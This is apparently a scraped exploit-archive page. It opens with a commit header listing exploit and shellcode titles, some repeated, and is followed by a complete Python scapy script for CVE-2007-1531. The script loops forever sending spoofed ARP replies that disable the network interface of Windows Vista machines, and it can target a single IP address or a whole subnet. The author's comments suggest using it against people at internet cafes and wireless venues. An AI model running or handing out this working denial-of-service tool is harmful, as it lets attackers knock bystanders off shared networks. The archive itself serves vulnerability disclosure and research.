880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
93 lines
No EOL
3.2 KiB
Python
Executable file
93 lines
No EOL
3.2 KiB
Python
Executable file
source: https://www.securityfocus.com/bid/23266/info
|
|
|
|
Microsoft Windows Vista is prone to a denial-of-service vulnerability.
|
|
|
|
Remote attackers may exploit this issue by submitting malicious ARP requests to the vulnerable computer. To exploit this issue, attackers must have access to the local network segment of a target computer.
|
|
|
|
Remote attackers can exploit this issue to cause the network interface to stop responding, denying further service to legitimate users.
|
|
|
|
#!/usr/bin/env python
|
|
#
|
|
# :: Kristian Hermansen ::
|
|
# Date: 20070514
|
|
# Reference: CVE-2007-1531
|
|
# Description: Microsoft Windows Vista (SP0) dumps interfaces when
|
|
# it receives this ARP packet. This DoS is useful for an internet
|
|
# cafe, wireless venue, or legitimate local attack. The victim will
|
|
# need to manually refresh their network interface. OK, sure
|
|
# it's a dumb local attack, but why does Vista disable iface!?!??
|
|
# -> Thanks to Newsham / Hoagland
|
|
# Vulnerable: Microsoft Windows Vista (SP0) [All Versions]
|
|
# Tested:
|
|
# * victim == Windows Vista Enterprise (SP0) [English]
|
|
# * attacker == Ubuntu Feisty (7.04)
|
|
# Usage: python fISTArp.py <victim>
|
|
# Depends: scapy.py
|
|
# [?] If you don't have scapy
|
|
# [+] wget http://hg.secdev.org/scapy/raw-file/tip/scapy.py
|
|
|
|
from sys import argv
|
|
from os import geteuid
|
|
from scapy import Ether,ARP,send,srp,conf
|
|
from time import sleep
|
|
|
|
conf.verb = 0
|
|
|
|
def head():
|
|
print """
|
|
__ ___ ____ _____ _
|
|
/ _|_ _/ ___|_ _|/ \ _ __ _ __
|
|
| |_ | |\___ \ | | / _ \ | '__| '_ \
|
|
| _|| | ___) || |/ ___ \| | | |_) |
|
|
|_| |___|____/ |_/_/ \_\_| | .__/
|
|
|_|
|
|
|
|
"""
|
|
|
|
def isroot():
|
|
if geteuid() != 0:
|
|
print "TRY AGAIN AS ROOT SILLY..."
|
|
return False
|
|
else:
|
|
return True
|
|
|
|
def usage():
|
|
print "usage:", argv[0], "<victim(s)>"
|
|
print "examples:", argv[0], "192.168.1.100"
|
|
print "examples:", argv[0], "192.168.1.0/24\n"
|
|
|
|
def fisting():
|
|
arp_fist = ARP(pdst=argv[1],op=2)
|
|
print "We are going to loop forever, CTRL-C to stop...\n"
|
|
while True:
|
|
sleep(3)
|
|
for a in arp_fist:
|
|
arping = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=a.pdst)
|
|
ans,unans = srp(arping,timeout=0.1)
|
|
if len(ans) == 1:
|
|
a.psrc=a.pdst
|
|
print a.pdst, "is ALIVE!"
|
|
print "* Time to shut it down!"
|
|
send(a)
|
|
ans2,unans2 = srp(arping,timeout=0.1)
|
|
if len(unans2) == 1:
|
|
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
|
|
print "@@@", a.psrc, "was rubber fisted!"
|
|
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
|
|
sleep(3)
|
|
else:
|
|
print "FAILED:", a.pdst, "is still alive :-("
|
|
else:
|
|
print a.pdst, "is already DEAD!"
|
|
print
|
|
|
|
head()
|
|
if isroot() != True:
|
|
exit(1)
|
|
if len(argv) != 2:
|
|
usage()
|
|
exit(1)
|
|
else:
|
|
fisting()
|
|
|
|
# u.b.u.n.t.u n.e.t.s.n.i.p.e.r t.h.c.t.e.st. |